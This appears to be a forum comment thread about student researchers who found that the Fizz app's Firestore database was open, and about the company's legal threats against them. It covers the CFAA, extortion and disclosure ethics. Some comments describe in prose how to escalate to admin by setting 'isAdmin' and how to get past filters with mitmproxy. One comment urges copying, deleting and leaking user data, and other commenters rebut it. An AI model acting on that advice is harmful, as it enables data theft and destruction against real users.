* Fizz appears to be a client/server application (presumably a web app?)
* The testing the researchers did was of software running on Fizz's servers
* After identifying a vulnerability, the researchers created administrator accounts using the database activity they obtained
* The researchers were not given permission to do this testing
If that fact pattern holds, then unless there's a California law governing this that I'm not aware of --- and even then, federal supremacy moots it, right? --- I think they did straightforwardly violate the CFAA, contra the claim in their response.
At least three things mitigate their legal risk:
1. It's very clear from their disclosure and behavior after disclosing that they were in good faith conducting security research, making them an unattractive target for prosecution.
2. It's not clear that they did any meaningful damage (this is subtle: you can easily rack up 5-6 figure damage numbers from unauthorized security research, but Fizz was so small and new that I'm assuming nobody even contemplating retaining a forensics firm or truing things up with their insurers, who probably did not exist), meaning there wouldn't have been much to prosecute.
3. Fizz's lawyers fucked up and threatened a criminal prosecution in order to obtain a valuable concession fro the researchers, which, as EFF points out, violates a state bar rule.
I think the good guys prevailed here, but I'm wary of taking too many lessons from this; if this hadn't been "Fizz", but rather the social media features of Dunder Mifflin Infinity, the outcome might have been gnarlier.
https://www.justice.gov/opa/pr/department-justice-announces-...
This seems like a problem with the existing law, if that's how it works.
It puts the amount of "damages" in the hands of the "victim" who can choose to spend arbitrary amounts of resources (trivial in the scope of a large bureaucracy but large in absolute amount), providing a perverse incentive to waste resources in order to vindictively trigger harsh penalties against an imperfect actor whose true transgression was to embarrass them.
And it improperly assigns the cost of such measures, even to the extent that they're legitimate, to the person who merely brought their attention to the need for them. If you've been operating a publicly available service with a serious vulnerability you still have to go through everything and evaluate the scope of the compromise regardless of whether or not this person did anything inappropriate, in case someone else did. The source of that cost was their own action in operating a vulnerable service -- they should still be incurring it even if they discovered the vulnerability themselves, but not before putting it in production.
The damages attributable to the accused should be limited to the damage they actually caused, for example by using access to obtain customer financial information and committing credit card fraud.
It reminds me of the case where AT&T had their iPad data subscriber data just sitting there on an unlisted webpage. Don't remember which way it went, but I think the guy went out of his way there to get all the data he could get, which isn't the case here.
Simply, anyone who "accesses a computer without authorization ... and thereby obtains ... information from any protected computer" is in violation of the CFAA.
If the researchers in question did not download any customer data, nor cause any "damages", I am not sure they are guilty of anything. BUT, if they had, "the victim had insufficient security measures" is not a valid defense. These researchers were not authorized to access this computer, regardless of whether they were technically able to obtain access.
Leaving your door unlocked does not give burglars permission to burgle you.
He ended up in prison.
(The conviction was later overturned on a jurisdictional detail, but I think he spent several months in federal prison.)
The OP doesn’t seem to have a “mea culpa” so I hope they learned this lesson even if the piece is more meme-worthy with a “can you believe what these guys tried to do?” tone.
While their intent seems good, they were pretty clearly breaking the law.
If some less ethical hackers got a hold of that data, much worse things could have happened.
* that's the biggest red flag. A company saying 100% obviously has very little actual security expertise.
PS: I'm a big fan of Germany's https://www.ccc.de/en/ who have pulled many such hacks against some of the biggest tech companies.
It is absolutely the right, and IMO, the duty, of security researchers to test every website, app, product and service that they use regularly to ensure the continued safety of the general public. This is too important of a field to have a "not my problem" attitude of just ignoring egregious security vulnerabilities so they can be exploited by criminals.
I was looking for a comment like this. You couldn't pay me enough to do this sort of thing in this day and age (unless working for a DoD or 3-letter agency contractor, which would have my back covered), nevermind to do it pro bono or bona fide or whatever it is that these guys had in mind (either way, it looks like they were not paid to do it).
This sort of action might still have been sort of ok-ish in the late '00s, maybe going into 2010, 2011, but when the Russian/Chinese/North Korean/Iranian cyber threats became real (plus the whole Snowden fiasco) then related laws began to change (both in the US and in Europe) and doing this sort of stuff with no-one to back you up for real (forget the EFF) meant that the one doing it would be asking for trouble in a big way.
The question isn't whether it should be done, but whether it should be done anonymously or openly.
TL;DR: it was good faith security research, and the US DoJ doesn't prosecute that.
Because bug bounties?
Last year, the department updated its CFAA charging policy to not pursue charges against people engaged in "good-faith security research." [1] The CFAA is famously over-broad, so a DOJ policy is nowhere near as good as amending the law to make the legality of security research even clearer. Also, this policy could change under a new administration, so it's still risky—just less risky than it was before they formalized this policy.
[1] https://www.justice.gov/opa/pr/department-justice-announces-...
If that fact pattern holds, then unless there's a California law governing this that I'm not aware of --- and even then, federal supremacy moots it, right? --- I think they did straightforwardly violate the CFAA, contra the claim in their response.
I am extremely not a lawyer but the pattern of legal posturing I've observed is that some lawyer makes grand over-reaching statements, the opposing lawyer responds with their own grand over-reaching statements."My clients did not violate the CFAA" should logically be interpreted as "good fucking luck arguing that my good faith student security researcher clients violated the CFAA in court".
Ignoring the legalities of it all, this step crosses a line morally imo.
> At the time, Fizz used Google’s Firestore database product to store data including user information and posts. Firestore can be configured to use a set of security rules in order to prevent users from accessing data they should not have access to. However, Fizz did not have the necessary security rules set up, making it possible for anyone to query the database directly and access a significant amount of sensitive user data.
> We found that phone numbers and/or email addresses for all users were fully accessible, and that posts and upvotes were directly linkable to this identifiable information. It was possible to identify the author of any post on the platform.
So AFAICT there is no indication they created any admin accounts to access the data. This is yet another example of an essentially publicly accessible database that holds what was supposed to be private information. This seems like a far less clear application of the CFAA than the pattern of facts you describe.
Really what happened is we checked whether we could set `isAdmin` to `true` on our existing accounts, and... we were able to. Adi's more technical writeup has details: https://saligrama.io/blog/post/firebase-insecure-by-default/
We all here no, there is no such thing as something 100% secure, but if you're gonna go making wild claim, you should have to stand by them.
Even if you are engaged in legitimate security research, it is highly unethical and unprofessional to willfully exceed your engagement limits. You may not even know the full reasoning of why those limits are established.
Fizz may have violated more than a state bar rule; this could very well be extortion (depending).
I would tend to agree with the balance of your comments.
I've seen examples of an employee contract, with things like "if any piece of this contract is invalid it doesn't invalidate the rest of the contract". The employer is basically trying to enforce their rules (reasonable), but they have no negative consequences if what they write is not allowed. At most a court deems that piece invalid, but that's it. The onus is on the reader to know (which tends to be a much weaker party).
Same here. Why can a company send a threatening letter ("you'll go 20 years to federal prison for this!!"), when it's clearly false? Shouldn't there be an onus on the writer to ensure that what they write is reasonable? And if it's absurdly and provably wrong, shouldn't there be some negative consequences more than "oh, nevermind"?
This concept of severability exists in basically all contracts, and is generally limited to sections that are not fundamental to the nature of the agreement. (The extent of what qualifies as fundamental is, as you said, up to a court to interpret.)
In your specific example of an employee contract, severability actually protects you too, by ensuring all the other covenants of your agreement - especially the ones that protect you as the individual - will remain in force even if a sub section is invalidated. Otherwise, if the whole contract were invalidated, you'd be starting from nothing (and likely out of a job). Some protections are better than zero.
In a right-to-work state, what protections can an individual realistically expect to receive from a contract?
Severability (the ability to "sever" part of a contract, leaving the remainder intact so long as it's not fundamentally a change to the contract's terms) comes from constitutional law and was intended to prevent wholesale overturning of previous precedent with each new case. It protects both parties from squirreling out of an entire legal obligation on a technicality, or writing poison pills into a contract you know won't stand up to legal scrutiny.
If part of the contract is invalidated, they can't leverage it. If that part being invalidated changes the contract fundamentally, the entire contract is voided. What more do you want?
It seems like you're arguing for some sort of punitive response to authoring a bad contract? That seems like a pretty awful idea re: chilling effect on all legal/business relationship formation, and wouldn't that likely impact the weaker parties worse as they have less access to high-powered legal authors? That means that even negotiating wording changes to a contract becomes a liability nightmare for the negotiators, doesn't that make the potential liability burden even more lopsided against small actors sitting across the table from entire legal teams?
I guess I'm having trouble seeing how the world you're imagining wouldn't end up introducing bigger risk for weaker parties than the world we're already in.
You’ll want the originally negotiated contract, minus the clause that can’t be enforced.
However, taken down one notch from theoretical to more practical:
> It seems like you're arguing for some sort of punitive response to authoring a bad contract?
Not quite so bluntly, but yes. There's obviously a gray area here. So not for mistakes, subtle technicalities. But if one party is being intentionally or absurdly overreaching then yes, I believe there should be some proportional punishment. Particularly if the writing party's intent is to scare out of inaction more than a core belief that their wording is true.
The way I think of it is maybe in similar terms as disbarring or something like that. So not something that would be a day-to-day concern for honest people doing honest work, but some potential negative consequences if "you're taking it too far" (of course this last bit is completely handwavy).
Maybe such a mechanism exists that I'm not aware of.
Imagine an employment contract that contains a non-compete clause (ignore, for a moment, your personal beliefs about non-compete clauses). The company may have a single employment contract that they use everywhere, and so in states where non-competes are illegal, the severability clause allows them to avoid having separate contracts for each jurisdiction. And now suppose that a state that once allowed non-competes passes a law banning them: should every employment contract with a non-compete clause suddenly become null and void? Of course not. That's what severability is for.
In the case in the OP, it's hard to say what the context is of the threat, but I imagine something along the lines of, "Unauthorized access to our computer network is a federal crime under statute XYZ punishable by up to 20 years in prison." Scary as hell to a layperson, but it's not strictly speaking untrue, even if most lawyers would roll their eyes and say that they're full of shit. Sure, it's misleading, and a bad actor could easily take it too far, but it's hard to know exactly where to draw the line if lawyers couch a threat in enough qualifiers.
At the end of the day, documents like this are written by lawyers in legalese that's not designed for ordinary people. It's shitty that they threatened some college students with this, and whatever lawyer did write and send this letter on behalf of the company gave that company tremendously poor advice. I guess you could complain to the bar, but it would be very hard to make a compelling case in a situation like this.
(This is also one of the reasons why collective bargaining is so valuable. A union can afford legal representation to go toe to toe with the company's lawyers. Individual employees can't do that.)
Does it have to be this way?
“the Group’s actions are also a violation of Buzz’s Terms of Use and constitute a breach of contract, entitling Buzz to compensatory damages and damages for lost revenue.”
“the Group’s agreement to infiltrate Buzz’s network is also a separate offense of conspiracy, exposing the Group to even more significant criminal liability.”
Emphasis added. The language is quite a bit more forceful and threatening than you make it out to be. Given that they were issuing these threats as an ultimatum, a "keep quiet about this or else...", it was likely a violation of California State Bar's rules of professional conduct.
I disagree with OP - a judge can always choose to invalidate a contract, regardless of severability. It is in there for the convenience of the parties, and I've not heard of it being used in bad faith.
they threaten if they receive written confirmation that the researchers won't discuss the security issues they won't pursue charges.
The lawyers were very much not "for your information you could be liable for x if someone responded poorly", they were in fact responding poorly.
Sure you still get some of that today. An especially old fashioned company, or in this case naive college students but overall things have shifted quite dramatically in favor of disclosure. Dedicated middle men who protect security researcher's identities, Large enterprises encouraging and celebrating disclosure, six figure bug bounties, even the laws themselves have changed to be more friendly to security researchers.
I'm sure it was quite unpleasant to go through this for the author, but it's a nice reminder that situations like this are now somewhat rare as they used to be the norm (or worse).
The fact that a lot of companies have embraced bug bounties and encourage this kind of stuff against them unfortunately teaches "kids" that this kind of thing is perfectly legal/moral/ethical/etc.
As this story shows though you're really rolling the dice, even though it worked out in this case.
> Discussions in forums / BBS's would be around if it was safe to disclose at all. Suggestions of anonymous email accounts and that sort of thing.
This is probably still a better idea if you don't have the cooperation of the target of the hack via some stated bug bounty program. But that doesn't help the security researcher "make a name" for themselves.
And you're basically admitting to the fact that you trespassed, even if all you did was the equivalent of walking through an unlocked door and verifying that you could look inside their refrigerator.
The fact that it may play out in the court of public opinion that you were helping to expose the lies of a corporation doesn't change the fact than in the actual courts you are guilty of a crime.
This is still the way to go even in many western countries.
https://stanforddaily.com/2022/11/01/opinion-fizz-previously...
That's wild!
A long time ago I was able to get admin access to an electric scooter company by updating my Firebase user to have isAdmin set to true, and then I accidentally deleted the scooter I was renting from Firebase. I am not sure what happened to it after that.
For example, say the statute of limitations for 18 USC 1030 is two years. If a person hypothetically stole a scooter by hacking, two years later, they would be in the clear, right?
No. The discovery rule says that if a damaged party, for good reason, does not immediately discover their loss, the statutes of limitations is paused until they do.
Accordingly, if the scooter company read a post today about a hack that happened “a long time ago” and therein discovered their loss, the statute of limitations would begin to tick today and the hacker could be in legal jeopardy for two more years.
So this is entirely on the dev team to blame.
You could also bypass the filter preventing searching for over 18 if you are under/under if you are over, and paid-only filters like location, gender, etc. by rewriting the requests with a mitmproxy (paid status is not checked server-side).
I imagine a web tool that could take the app id and other api values (that are publicly embedded in frontend apps), optionally support a session id (for those firestore apps that use a lightweight “only visible to logged in users” security rule) and accept names of collections (found in the js code) to explore?
[1] https://github.com/iosiro/baserunner
[2] https://saligrama.io/blog/post/firebase-insecure-by-default/
>Although Fizz released a statement entitled “Security Improvements Regarding Fizz” on Dec. 7, 2021, the page is no longer navigable from Fizz’s website or Google searches as of the time of this article’s publication.
And, it seems likely the app still stores personally identifiable information about its "anonymous" users' activity.
> Moreover, we still don’t know whether our data is internally anonymized. The founders told The Daily last year that users are identifiable to developers. Fizz’s privacy policy implies that this is still the case
I suppose the 'developers' may include the same founders who have refused to comment on this, removed their company's communications about it, and originally leveraged legal threats over being caught marketing a completely leaky bucket as a "100% secure social media app." Can't say I'm in a hurry to put my information on Fizz.
https://web.archive.org/web/20220204044213/https://fizzsocia...
What I was looking for was if they really had a page that claimed "100% secure", but I don't think that was captured by archive.org
It's only legal to use the legal action, period. Once you pull in a THREAT, it becomes blackmail/extortion.
1. threatening violence is explicitly a crime
2. at a higher level, threatening violence is a crime because the underlying act (committing violence) is also a crime. threatening to do a legal act is largely legal. it's not illegal to threaten reporting to the authorities, for instance.
It absolutely can be illegal, in the case of extortion. If you say "do this or I turn you in" that's extortion.
Legally, can this cover talking to e.g. state prosecutors and the police as well? Because claiming to be "100% secure", knowing you are not secure, and your users have no protection against spying from you or any minimally competent hacker, is fraud at minimum, but closer to criminal wiretapping, since you're knowingly tricking your users into revealing their secrets on your service, thinking they are "100% secure".
That this ended "amicably" is frankly a miscarriage of justice - the Fizz team should be facing fraud charges.
After that, that they continued their "100% secure" marketing on one side, while threatening researchers into silence on the other, is plainly malicious.
We care more about corporations than citizens in the US. Advertising in the US is full of false claims. We ignore this because we pretend like words have no meaning.
Fantastic for calling Fizz out. "Fizz did not protect their users’ data. What happened next?" This isn't a "someone hacked them". It's that Fizz failed to do what they promised.
I'm still curious to hear if the vulnerability has been tested to see if it's been resolved.
I don't think this applies to the reporter in this case, but it does seem like there's a bit of a trend in security research lately to capitalize on the publicity of finding a vulnerability for one's own personal branding. That feels a bit disingenuous. Not that the appropriate response would be to threaten someone with legal action.
It's not about personal branding, it's about protecting the users of the app. Either the app fixes the vulnerability so the users are no longer in danger, or the users are made aware that they are in danger.
It's completely fine to discuss or request a different disclosure date when communicating with researchers. The delay is their protection against inaction.
On the other hand, assuming the app creators we in far over their heads when it comes to proper security, I have to wonder if they started off cordially and then freaked out a short while later because after trying, they realized there was no possible way for them to correct the issue in the given timeline. So in desperation they resorted to something drastic (and arguably unethical) to cover their asses.
It's practically a given that the actual security (or privacy) of a software is inversely proportional to its claimed security and how loud those claims are. Also, the companies that pay the least attention to security are always the ones who later, after the breach, say "We take security very seriously..."
In all honesty, nothing good usually comes from that. If you wanted the truth to be exposed, they would have been better off exposing it anonymously to the company and/or public if needed.
It's one thing to happen upon a vulnerability in normal use and report it. It's a different beast to gain access to servers you don't own and start touching things.
“Keep calm” and “be responsible” and “speak to a lawyer” are things I class as common sense. The gold nugget I was looking for was the red flashing shipwreck bouy/marker over the names.
https://stanforddaily.com/2022/11/01/opinion-fizz-previously...
Am I to understand you can attempt to hack any computer to gain unauthorized access without prior approval? That doesn't seem legal at all.
Whether or not there was a vulnerability, was the action taken actually legal under current law? I don't see anything indicating for or against in the article. Just posturing that "ethical hacking" is good and saying you are secure when you aren't is bad. None of that seems relevant to the actual question of what the law says.
(b) You don't require permission to test software running on hardware you control (absent some contract that says otherwise).
(c) But you're right, in this case, the researchers presumably did need permission to conduct this kind of testing lawfully.
Weird stance. Sure, you may disagree on the limitations of scope of various ethical hacking programs (bug bounties and such) but they consistently highlight some very serious flaws in all kinds of hardware and software.
Going out of scope (hacking a company with no program in place) is always a gamble and you’re betting on the leniency of the target. Probably not worth it unless you like to live dangerously.
Kudos to Cooper, Miles and Aditya for seeing this through.
They could threaten to report you to the police or such authorities, but they would have to turn over their evidence to them and to you and open all their relevant records to you via discovery.
> Get a lawyer
Yes, if they're seriously threatening legal action they already have one.
That's not true, depending on where you live in the US. Several states allow private citizens to file criminal charges with a magistrate. IIRC, NJ law allows actual private prosecution of criminal charges, subject to approval by a judge and prosecutor. I think that's a holdover from English common law.
That would've been a better legal threat to put on them as a offensive move, instead of using the EFF. "Sure you can attempt to have me jailed but your threat is clear-cut felony extortion. See you in the jail cell right there with me!"
Maybe it's because I'm getting old, but it would never cross my mind to take any of this personally.
If they're this bad at security, this bad at marketing, and then respond to a fairly standard vulnerability disclosure with legal threats it's pretty clear they have no idea what they're doing.
Being the "good guy" can sometimes be harder than being the "bad guy", but suppressing your emotions is a basic requirement for being either "guy".
Yup, that's it :) These kids are either in college or just graduated. They were smart enough to get themselves legal help before saying anything stupid, which is impressive. Cut them some slack!
And yet, according to the linked article in the Stanford Daily, they received $4.5 million in funding
This is wholly and obviously illegal but so is the described ethical hacking. You have adopted a complex nuanced strategy to minimize harm to all parties. This is great morally but as far as I can tell its only meaningful legally insofar as it makes folks less likely to go after you nothing about it makes your obviously illegal actions legal so if you are going to openly flout the law it makes sense to put less of a target on your back while you are breaking the law.
Payouts for finding bugs when there isn't an already established process are either not going to be worth your time or will be seen as malicious activity.
The next time someone discovers a company that has poor database security, they should, IMO: (1) make a full copy of confidential user data, (2) delete all data on the server, (3) publish confidential user data on some dumping site; and protect their anonymity while doing all 3 of these.
If these researchers had done (2) and (3) – and done so anonymously, that would have not only protected them from legal threats/harm, but also effectively killed off a company that shouldn't exist – since all of Buzz/Fizz users would likely abandon it as consequence.
Aaron Swartz only did (1). Failing at (4) didn't end so well for him.
I get that you're frustrated but encouraging others to make martyrs of themselves is cowardice. If some dumb kid tries this and their opsec isn't bulletproof, they're fucked. Put your own skin in the game and do it yourself if your convictions are that strong.
It's especially unwise because you now give the company a massive incentive to hire real forensics specialists to try to track you down. You're placing a lot of faith in your ability to remain anonymous under that level of scrutiny.
No, it wouldn’t. Anonymity can be penetrated, and the more incentive people have to do so, the more likely it will be.
Is that the clinical term for Internet Tough Guy?
I imagine deleting the DB would almost certainly lead to actual CFAA consequences. Which kinda suck, as I recall.
[0]: https://stanforddaily.com/2022/11/01/opinion-fizz-previously...
Personally, I don't see it as worth it to pursue a company that does not hang out some sort of public permission to poke at them. The upside is minimal and the downside significant. Note this is a descriptive statement, not a normative statement. In a perfect world... well, in a perfect world there'd be no security vulnerabilities to find, but... in a perfect world sure you'd never get in trouble for poking through and immediately backing off, but in the real world this story just happens too often. Takes all the fun right out of it. YMMV.
Nothing else is ethically viable. Nothing else protects the researcher.
This during a time when thousands or millions have their personal data leaked every other week, over and over, because companies don't want to cut into their profits.
Researchers who do the right thing face legal threats of 20 years in prison. Companies who cut corners on security face no consequences. This seems backwards.
Remember when a journalist pressed F12 and saw that a Missouri state website was exposing all the personal data of every teacher in the state (including SSN, etc). He reported the security flaw responsibly and it was embarrassing to the State so the Governor attacked him and legally harassed him. https://arstechnica.com/tech-policy/2021/10/missouri-gov-cal...
I once saw something similar. A government website exposing the personal data of licensed medical professionals. A REST API responded with all their personal data (including SSN, address, etc), but the HTML frontend wouldn't display it. All the data was just an unauthenticated REST call away, for thousands of people in the state. What did I do? I just closed the tab and never touched the site again. It wasn't worth the personal risk to try to do the right thing so I just ignored it and for all I know all those people had their data stolen multiple times over because of this security flaw. I found the flaw as part of my job at the time, I don't remember the details anymore. It has probably been fixed by now. Our legal system made it a huge personal risk to do the right thing, so I didn't do the right thing.
Which brings me to my point. We need strong protections for those who expose security flaws in good faith. Even if someone is a grey hat and has done questionable things as part of their "research", as long as they report their security findings responsibly, they should be protected.
Why have we prioritized making things nice and convenient for the companies over all else? If every American's data gets stolen in a massive breach, it's so sad, but there's nothing we can do (shrug). If one curious user or security research pokes an app and finds a flaw, and they weren't authorized to do so, OMG!, that person needs to go to jail for decades, how dare they press F12!!!1
This is a national security issue. While we continue to see the same stories of massive breaches in the news over and over and over, and some of us get yet another free year of monitoring that credit agencies don't commit libel against us, just remember that we put the convenience of companies above all else. They get to opt-in to having their security tested, and over and over they fail us.
Protect security researchers, and make it legal to test the security of an app even if the owning company does not consent. </rant>
If that happens the whole calculus of bug bounties changes immediately.
How do devs forget this step before raising 4.5 million in seed funding?
If a curious kid does a port scan police will smash down doors. People will face decades in prison.
If a negligent company leaks the private data of every single American, well, gee, what could we have done more, we had that one company do an audit and they didn't find anything and, gee, we're just really sorry, so lets all move on and here's a free year of credit monitoring which you may choose to continue paying us for at the end of the free year.
It's effectively legalizing fraud for a big chunk of computer security. Sure fraud itself is technically still illegal, but so is exposing it.
My understanding is that these security researchers only accessed their own accounts and data on the cloud servers, and in doing so they did not bypass any "effective technical protections on access."
Thankfully for all of us, the DoJ appears to disagree with your sentiment. At least with the current administration.
Is it your position is that when you are lied to, and your sensitive and personally identifying information is being grossly mishandled by a company, your only recourse is to spend thousands of dollars and incredible amounts of time on a court case that has very little chance of achieving anything?